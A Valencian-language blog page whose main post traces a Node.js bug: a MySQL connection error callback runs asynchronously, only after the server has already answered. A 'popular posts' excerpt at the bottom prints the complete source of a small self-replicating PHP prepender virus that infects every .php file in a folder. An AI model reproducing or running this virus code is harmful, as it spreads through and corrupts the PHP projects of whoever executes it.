Ves al contingut principal

Handlers d'errors en node.js quina bogeria ;)

Després de dos dies tornat-me varilla amb els handlers d'error en node.js, al final, quasi de casualitat he descobert que passa. Imaginem que vull connectar a una base de dades:

function doLogin(){
  var client = mysql.createConnection('mysql://'+user + ':'+pass+'@'+server+'/'+database);
  client.connect();
 }//function doLogin


La funció connect pot fallar en cas que els paràmetres siguen incorrectes, no hi haja connexió... si eixe error no és capturat, tanca el programa (tancant el servidor). Primer proví amb try catch, herència d'altres llenguatges no tant moderns ;) i no, no vaig aconseguir capturar l'error. Per tant vaig llegir que la millor cosa que podia fer en javascript (node.js) era afegir  una funció callback (que s'executa en cas d'error, i passada com a paràmetre). La funció ha de ser algo així:

 function errResult(err,result){
  if (err != null) {
         berror = true;
   }
  else{
       berror = false;
  }
 }//function errResult


on en err estarà el missatge d'error i berror serà una variable d'error que podrem examinar si hi ha havut error o no al login. canviarem el codi de doLogin per:

client.connect(errResult);

i tindrem el codi següent per a veure si s'ha produït el login correctament:

doLogin()
if (!berror) {//login OK
    res= "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><resposta>OK</resposta>";
  }
  else{//error login
    res = cadena_error_login_ini + error_missatge +cadena_error_login_fi;
  }

La lògica ens dius que quan cridem a doLogin, esta cridarà a errResult i actualitzarà la variable berror en el cas pertinent. Això pensava jo i res més lluny de la realitat. La cosa és que posara les dades que posara sempre em donava OK. Com ja he dit duc un cap de setmana fent proves i no hi ha habut manera. Al final he decidit fer un log de totes les accions a veure que passava:

 function doLogin(){
  var client = mysql.createConnection('mysql://'+user + ':'+pass+'@'+server+'/'+database);
  console.log("Abans de connect");
  client.connect(errResult);
  console.log("Després de connect");
 }//function doLogin


function errResult(err,result){
  if (err != null) {
     error_missatge=err;
     berror = true;
     console.log("Ha havut un error però s\'haurà capturat?");
   }
  else{
    error_missatge = "";
    berror = false;
  }
  console.log(berror);
 }//function errResult


I en la funció del servidor (hi ha més coses però les estic omitint per no fer més llarg el copy & paste):

doLogin();
  console.log("doLogin");
  if (!berror) {//login OK
    res= "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><resposta>OK</resposta>";
  }
  else{//error login
    res = cadena_error_login_ini + error_missatge +cadena_error_login_fi;
  }

 response.end(res);
console.log("final servidor");





L'eixida de consola deuria de ser:
Abans de connect
Ha havut un error però s'haurà capturat?
 Després de connect
doLogin
final servidor





Però no, resulta ser:

Abans de connect
Després de connect
doLogin
final servidor
Ha havut un error però s'haurà capturat?

Cosa que ens indica que la funció callback de maneig d'error s'execute una vegada ha acabat la funció principal del servidor. Per tant este model no ens val per capturar l'error. Caldrà canviar el model, pròximament posaré la solució al problema ;)

Comentaris

Entrades populars d'aquest blog

Parlem de Bloc i País?

Comence una nova etapa en el tema polític, de fet ja fa temps que la vaig començar, però ara ho fet involucrant-me activament als assumptes interns del meu partit. Em defineix a mi mateix com una persona activa (de vegades inclús hiperactiva), amb inquietuds i preocupacions, en definitiva, em mou les ganes de ser útil a la meua gent i l’estima pel meu país. Aquestes voluntats però, no les he vistes, o almenys, ja no les veig tan a sovint en el tarannà del meu partit. No negaré que, potser, tinc desavinences en l’actual línia de la direcció (allò que s’ha anomenat com el “aparato”), però la casuística dels últims viratges polítics no han deixat lloc a altra possibilitat. No vaig a repetir totes les actuacions que adés i ara van demostrar que els abanderats de la nova política no es comportaren com a tal. Tots sabem quines són. Però d'una si que en parlaré, una que per a mi fou bastant reiterativa i té molta relació en un dels principis de Goebbels, que és el de fer creure que la di…

Què poden(m) fer els polítics nacionalistes valencians?

Davant del procés que s'ha encetat a Catalunya, el primer que m'agradaria és mostrar el meu suport. Pot ser s'hagen fet errors, com en tot en esta vida. Ara bé, votar no pot ser mai antidemocràtic, i per tant el seu destí els decidiran ells. 
Alguns hem observat, sempre amb il·lusió, que pot ser després d'ells anem nosaltres, els valencians. Però la realitat és tossuda. Mai hem tingut un sentiment nacionalista similar als catalans. I, possiblement, mentre no fem alguna cosa per canviar-ho, no el tindrem. Per exemple, podem veure l'evolució  segons el CIS del sentiment nacionalista/independentista valencià i català:

Durant els primers anys (94 i 97) es codificava del 0 al 10, però al 2005, preguntaren allò de "sólo español" (que ho he codificat com un 2), "más español que (gentilicio)" (que será un 4),  "igual español que (gentilicio)" (que serà un 6),  "más (gentilicio) que español" (que serà un 8) i "sólamente (gentilicio…

Virus en PHP

Acabe de trobar un exemple simple de virus en PHP, m'he quedat flipat de la sensillesa, és clavat als virus.bat de MS-DOS:
1. Busca tots els .php de la carpeta
2. Si no està infectat:
  2.1 Escriu el contingut de la part del virus (anomenada prepender, 391 bytes) a l'inicio de l'arxiu
  2.2 busca el següent arxiu i ves al punt dos


Pareix simple i el codi la veritat és que ho demostra:

- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - - <?php // SPTH $string=fread(fopen(__FILE__,'r'), 391); $curdir=opendir('.'); while ($file = readdir($curdir)) { if (strstr($file, '.php')) { $victim=fopen($file, 'r+'); if (!strstr(fread($victim, 13), 'SPTH')) { rewind($victim); fwrite($victim, $string.fread($victim, filesize($file));); } fclose($victim); } } closedir($curdir); ?>